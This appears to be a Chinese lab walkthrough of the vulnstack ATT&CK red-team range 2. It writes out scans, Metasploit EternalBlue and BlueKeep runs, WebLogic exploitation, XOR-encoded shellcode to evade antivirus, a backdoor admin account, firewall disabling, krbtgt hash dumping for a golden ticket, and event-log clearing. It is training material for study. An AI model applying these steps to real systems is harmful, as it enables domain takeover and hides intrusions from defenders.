ATT&CK红队评估实战靶场二渗透测试教学文档

靶场环境搭建

下载与配置

• 靶场下载地址: http://vulnstack.qiyuanxuetang.net/vuln/detail/3/
• 默认账户: administrator
• 默认密码: 1qaz@WSX

网络拓扑配置

• Win11:
  • IP: 192.168.73.1
  • 网关: 192.168.73.2
• Kali:
  • IP: 192.168.73.128
  • 网关: 192.168.73.2
• WEB(Server2008):
  • 外网: 192.168.73.137
  • 内网: 10.10.10.80
  • 网关: 192.168.73.2(外网), 10.10.10.1(内网)
• DC(Server2012):
  • 内网: 10.10.10.10
  • 网关: 10.10.10.1
• PC(Windows7):
  • 外网: 192.168.73.136
  • 内网: 10.10.10.201
  • 网关: 192.168.73.2(外网), 10.10.10.1(内网)

Web服务启动

1. 进入WEB服务器路径: C:\Oracle\Middleware\user_projects\domains\base_domain\bin
2. 以管理员权限依次运行:
   • setDomainEnv.cmd
   • startManagedWebLogic.cmd
   • startWebLogic.cmd

信息收集阶段

主机发现

nmap -sP 192.168.73.0/24

端口扫描

nmap -sS -sV -Pn 192.168.73.137

扫描结果:

• 80/tcp: Microsoft IIS httpd 7.5
• 135/tcp: Microsoft Windows RPC
• 139/tcp: Microsoft Windows netbios-ssn
• 445/tcp: Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
• 1433/tcp: Microsoft SQL Server 2008 R2 10.50.4000; SP2
• 3389/tcp: ms-wbt-server?
• 7001/tcp: Oracle WebLogic Server (Servlet 2.5; JSP 2.1)
• 49152-49154/tcp: Microsoft Windows RPC

目录扫描

python dirsearch.py -u "http://192.168.73.137/"
python dirsearch.py -u "http://192.168.73.137:7001/"

发现: WebLogic登录页面(版本10.3.6.0)

漏洞利用尝试

135端口(MSRPC服务)

• 测试漏洞: MS08-067
• 结果: Windows Server 2008已修复该漏洞

139/445端口(SMB服务)

• 测试漏洞: MS17-010(永恒之蓝)
• 利用步骤:

  msfconsole
  search ms17-010
  use auxiliary/scanner/smb/smb_ms17_010
  set rhost 192.168.73.137
  exploit
  
  use exploit/windows/smb/ms17_010_eternalblue
  set rhost 192.168.73.137
  exploit
  

• 结果: 漏洞存在但无法获取shell(可能因360杀毒软件拦截)

3389端口(RDP服务)

• 测试漏洞: CVE-2019-0708(BlueKeep)
• 利用步骤:

  use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
  set rhosts 192.168.73.137
  exploit
  
  use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
  set rhosts 192.168.73.137
  set target 1
  run
  

• 结果: 导致目标蓝屏，重启后仍无法获取shell

7001端口(WebLogic服务)

• 常见漏洞:

  1. CVE-2018-2894(任意文件上传)
  2. CVE-2017-10271(XMLDecoder反序列化)
  3. CVE-2018-2628(反序列化)
  4. CVE-2020-14882(未授权命令执行)
  5. CVE-2020-2555
  6. 弱口令登录

• 漏洞扫描:

  python ws.py -t 192.168.73.137
  

• 利用工具: WeblogicTool

  java8 -jar WeblogicTool_1.3.jar
  

• 结果: 成功执行系统命令，注入内存马

权限获取与绕过杀毒软件

绕过360杀毒

1. 尝试直接添加用户(失败):

   net user canxue 2005.com /add
   net localgroup Administrators canxue /add
   

2. 使用免杀shellcode:

   • 编写免杀C程序(使用异或编码)
   • 动态调用API(VirtualAlloc, VirtualProtect, CreateThread)
   • 上传并执行shellcode

3. 成功添加用户:

   net user canxue 2005.com /add
   net localgroup Administrators canxue /add
   

4. 远程桌面连接:

   • 账户: canxue
   • 密码: 2005.com
   • 连接后手动关闭360杀毒

权限提升

• 使用CS(Cobalt Strike)自带的svc提权功能获取system权限

关闭防火墙

netsh advfirewall show all state
netsh advfirewall set allprofile state off

域渗透

信息收集

1. 确认域环境:

   ipconfig /all
   

   • 发现域: da1ay.com

2. 查看域控:

   net group "domain controllers" /domain
   

   • 域控机器: DC

3. 域内成员:

   • DC(域控): 10.10.10.10
   • PC: 10.10.10.201
   • WEB(当前控制主机)

4. 端口扫描域内主机:

   • DC(10.10.10.10): 135, 139, 88, 53, 3389, 445
   • PC(10.10.10.201): 135, 139, 3389, 445

5. 查看域用户和管理员:

   net user /domain
   net group "domain admins" /domain
   

横向移动

1. 使用psexec和抓取的明文密码横向移动
2. 成功控制DC和PC主机

权限维持

1. 获取krbtgt的hash值:

   hashdump
   

   • krbtgt:502:aad3b435b51404eeaad3b435b51404ee:82dfc71b72a11ef37d663047bc2088fb:::

2. 获取SID:

   wmic useraccount get uid
   

   • 示例: S-1-5-21-2756371121-2868759905-3853650604-1001

3. 制作黄金票据

4. 访问域控C盘:

   dir \\10.10.10.10\c$
   

痕迹清除

wevtutil el                  # 列出所有日志名称
wevtutil cl system           # 清理系统日志
wevtutil cl application      # 清理应用程序日志
wevtutil cl security         # 清理安全日志

关键点总结

1. 多漏洞利用尝试: 从多个端口和服务寻找突破口
2. 绕过杀毒技巧: 免杀shellcode编写和动态API调用
3. 域渗透流程: 信息收集→横向移动→权限维持
4. 黄金票据制作: 获取krbtgt hash和SID是关键
5. 痕迹清理: 清除各类日志避免被发现

通过这套完整的渗透流程，成功从外网渗透进入内网，并最终控制了整个域环境。